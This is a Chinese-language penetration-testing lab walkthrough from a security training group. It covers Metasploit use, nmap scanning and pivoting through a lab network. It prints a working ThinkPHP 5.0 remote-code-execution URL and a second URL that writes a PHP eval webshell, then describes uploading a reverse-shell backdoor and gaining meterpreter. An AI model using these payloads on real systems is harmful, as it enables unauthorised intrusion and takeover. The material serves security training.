出品｜MS08067實驗室（www.ms08067.com)

本文作者：dch（Ms08067實驗室 SRSP TEAM小組成員）

一、利用Metasploit進行攻擊的流程圖

??Metasploit滲透流程

二、Metasploit滲透攻擊

（1）通過msfconsole命令啟動Metasploit在這個程序中，系統會主動加載資料庫，如圖2所示：

??啟動Metasploit

（2）使用輔助模塊進行埠掃描，如下圖所示：

??進行掃描

（3）尋找合適的漏洞利用模塊并使用，如下圖所示：

??加載模塊

（4）查看并修改引數，如下圖所示：

??修改引數

（5）利用漏洞 Exploi，如下圖所示：

??漏洞利用

三、實施攻擊

1、靶機、攻擊機

（1）目標地址 192.168. 222 130
（2）攻擊地址 192.168. 238.129

2、用nmap進行埠掃描（通過埠掃描找到其開放的服務，再根據相關的服務查找與之相對應的漏洞進行利用），如圖7所示

??埠掃描

通過掃描可以看到Target1發現開放了21（ftp）、22（ssh）、80（http ）、111（RPC）、888 （http）、3306（Mysql）、8888（http）這些埠服務，且是一個Linux 的作業系統，

3、進入web界面

??web界面

打開后發現它是ThinkPHP框架，版本是V5.0，這時候想到它存在一個

RCE（遠程命令執行）漏洞，先用POC（利用程式）測驗一下

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

結果如下圖所示

??進行漏洞測驗

4、成功出現了PHPinfo界面，說明該版本是存在漏洞的，用POC寫入一句話，寫入一句話到cmd.php：

http://192.168.222.130/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST['cmd']);?>" > cmd.php

5、上傳后，通過蟻劍進行連接，發現并不能成功連接，發現是$_POST被過濾了，這里可以利用編碼（如Base64、URL）后再次上傳，

6、用蟻劍進行連接，成功連接，此時已經獲取到該主機的shell，可以查看系統的資訊等，如下圖所示：

??成功獲得shell

??查看系統資訊

7、根據攻擊機的IP地址及目標靶機的系統型別生成對應的后門檔案，如下圖所示：

??查看攻擊機IP

??制作后門

8、在kali中配置運行監聽模塊，如下圖所示：

??msf設定監聽

9、通過蟻劍將后門檔案shell.elf上傳到靶機中，并賦予777權限以執行，如下圖所示：

??上傳shell.elf后門檔案

??賦予777權限執行

10、獲得 meterpreter，如下圖所示

??獲得meterpreter

11、查看可用網段，如下圖所示

??查看可用網段

12、發現兩個網段：一個是192.168.2.0/24，另一個是192.168.222.0/24，通過meterpreter對192.168.222.0/24添加第二層的路由，如下圖所示

??添加第二層路由

13、添加成功后進行內網掃描，查看內網中存活的主機，如下圖所示

??查看存活主機

14、發現第二層靶機192.168.222.128，如下圖所示

??出現第二層網址

15、在MSF中設定代理

??設定代理

通過設定代理，進行下一步的內網滲透

四、參考文章

??https://www.anquanke.com/post/id/170649

?
?
?

招新

微信聯系方式：cos2606596924
滿足以下要求均可嘗試
1.至少會一門編程語言
2.漏洞平臺上提交過漏洞超過20個
3.每月一文章分享(考慮有些要上班)?
?
?
?
?

轉載請聯系作者并注明出處！

Ms08067安全實驗室專注于網路安全知識的普及和培訓，團隊已出版《Web安全攻防：滲透測驗實戰指南》，《內網安全攻防：滲透測驗實戰指南》，《Python安全攻防：滲透測驗實戰指南》，《Java代碼安全審計（入門篇）》等書籍，
團隊公眾號定期分享關于CTF靶場、內網滲透、APT方面技術干貨，從零開始、以實戰落地為主，致力于做一個實用的干貨分享型公眾號，
官方網站：https://www.ms08067.com/

掃描下方二維碼加入實驗室VIP社區
加入后邀請加入內部VIP群，內部微信群永久有效！